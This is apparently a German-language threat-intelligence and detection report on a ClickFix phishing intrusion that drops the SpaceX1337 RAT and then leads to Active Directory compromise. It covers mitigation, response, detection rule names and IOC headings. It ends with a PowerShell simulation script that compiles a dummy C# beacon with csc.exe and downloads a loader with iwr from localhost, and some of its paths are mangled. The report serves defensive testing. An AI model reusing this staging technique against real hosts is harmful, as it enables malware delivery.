SpaceX1337 ClickFix führt zu Hands-on-Keyboard AD-Kompromittierung
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Ein Angreifer nutzte einen ClickFix-Phishing-Köder, um das SpaceX1337 RAT einzusetzen, gefolgt von einer mehrstufigen Infektion mit handelsüblichen RATs wie NetSupport, AsyncRAT und Remus. Der Eindringling entwickelte sich von automatischem Credential-Diebstahl zu interaktivem Hands-on-Keyboard-Aktivität, die auf Active Directory abzielt. Der Angreifer versuchte letztendlich die seitliche Bewegung zu einem Domänencontroller und Credential-Stuffing gegen ein VPN-Portal.
Untersuchung
Der Einbruch wurde in einem voll instrumentierten Active Directory Honeynet erfasst, das durchgängige Sichtbarkeit durch EDR-, Zeek- und Suricata-Telemetrie bietet. Forscher verfolgten die Aktivität vom initialen PowerShell-Downloader über umfangreiche ADSI/LDAP-Rekognoszierung und seitliche Bewegung über SMB. Die Untersuchung identifizierte klar den Übergang von der automatisierten Malware-Ausführung zur direkten Interaktion durch einen menschlichen Operator.
Minderung
Organisationen sollten strenge PowerShell-Ausführungsrichtlinien durchsetzen und verdächtige Eltern-Kind-Prozessbeziehungen überwachen, einschließlich explorer.exe zur Ausführung von PowerShell. Sicherheitsteams sollten die On-Host-Kompilierung durch csc.exe und den Missbrauch von LOLBins wie certutil or bitsadmin für externe Downloads. Active Directory sollte auch gestärkt werden, indem sensible Daten aus LDAP-Attributen entfernt und anomale LDAP-Anfragen überwacht werden.
Reaktion
Wenn verdächtige Aktivitäten erkannt werden, sollten Incident-Responder die betroffenen Endpunkte isolieren und potenziell kompromittierte Dienstkonto- und Domänenadministrator-Anmeldeinformationen widerrufen. Die Ermittlungen sollten die Identifizierung mehrerer RAT-Familien priorisieren und nach unbefugten geplanten Aufgaben oder Registrierungsmäßigen Änderungen suchen. VPN-Protokolle sollten auch auf Credential-Stuffing-Versuche aus bekannter bösartiger Infrastruktur überprüft werden.
Angriffsablauf
Erkennungen
Python-Ausführung aus verdächtigen Ordnern (via cmdline)
Verdächtiger RunMRU-Eintrag mit LOLBin-Semantik (via registry_event)
Befehlsausführung auf Remote-Host mit Windows Remote Management (via cmdline)
Mögliche Konto- oder Gruppenaufzählung / -manipulation (via cmdline)
Verdächtige Domain-Trust-Erkennung (via cmdline)
Mögliche Erkennung der Systemnetzwerkkonfiguration (via cmdline)
Verdächtige ausführbare Datei mit nur Zahlen im Namen (via cmdline)
LOLBAS Schtasks (via cmdline)
Verwendung von Certutil für Datenkodierung und Zertifikatsoperationen (via cmdline)
LOLBAS Bitsadmin (via cmdline)
Mögliches SAM/SYSTEM/SECURITY-Dumping (via cmdline)
Aufruf verdächtiger .NET-Methoden aus Powershell (via powershell)
Verdächtige Trycloudflare-Domain-Kommunikation (via dns)
Mögliche IP-Lookup-Domain-Kommunikationsversuche (via dns)
IOCs (HashSha256) zur Erkennung: Von ClickFix SpaceX1337 zu Hands-on-Keyboard AD-Angriff
IOCs (HashMd5) zur Erkennung: Von ClickFix SpaceX1337 zu Hands-on-Keyboard AD-Angriff
IOCs (SourceIP) zur Erkennung: Von ClickFix SpaceX1337 zu Hands-on-Keyboard AD-Angriff
IOCs (DestinationIP) zur Erkennung: Von ClickFix SpaceX1337 zu Hands-on-Keyboard AD-Angriff
Hochwertige Sigma-Regel für SpaceX1337 und AdaptixC2-Kommunikation [Windows-Netzwerkverbindung]
Erkennung der AdaptixC2-Beacon-Kompilierung und des PowerShell-Loaders [Windows-Prozesserstellung]
Simulationsausführung
Voraussetzung: Der Telemetrie- & Basislinien-Preflight-Check muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der feindlichen Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN genau die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle: Ein Gegner hat über einen Phishing-Link initialen Zugriff erlangt. Um ein bekanntes bösartiges
.exenicht auf die Festplatte zu bringen, laden sie eine kleine.csQuelldatei herunter. Sie rufen danncsc.exeauf, um diese Quelle in eine funktionale Windows- ausführbare Datei (svc.exe) im%TEMP%Verzeichnis zu kompilieren. Unmittelbar nach der Kompilierung verwendet der Angreifer PowerShell, um einen Second-Stage-Loader von einem Remote-C2-Server (simuliert durch einen lokalen Listener) mit demiwr(Invoke-WebRequest) Alias abzurufen, der im Temp-Ordner gespeichert wird, um den Staging-Prozess zu vervollständigen. -
Regressions-Testskript:
# 1. Erstellen Sie eine Dummy-C#-Quelldatei, um die AdaptixC2-Quelle zu simulieren $csFile = "$env:TEMPsvc.cs" $exeFile = "$env:TEMPsvc.exe" $sourceCode = @" using System; namespace MimicC2 { class Program { static void Main() { Console.WriteLine("Simuliertes Beacon"); } } } "@ $sourceCode | Out-File -FilePath $csFile -Encoding ascii # 2. Simulieren Sie die csc.exe-Kompilierung (löst selection_csc aus) # Hinweis: Wir verwenden die exakt in der Erkennungslogik angegebenen Flags Start-Process "csc.exe" -ArgumentList "/target:winexe", "/out:$env:TEMPsvc.exe", "$env:TEMPsvc.cs" -Wait # 3. Simulieren Sie den PowerShell-Download (löst selection_powershell aus) # Wir verwenden 'iwr' und den spezifischen OutFile-Pfad, um die Logik zu treffen # Mit einer nicht existierenden URL, um echten Netzwerkverkehr zu vermeiden, aber die Befehlszeile wird übereinstimmen powershell.exe -Command "iwr -Uri 'http://127.0.0.1' -OutFile `"$env:TEMPx.ps1`"" -
Bereinigung Befehle:
Remove-Item -Path "$env:TEMPsvc.cs" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPsvc.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPx.ps1" -Force -ErrorAction SilentlyContinue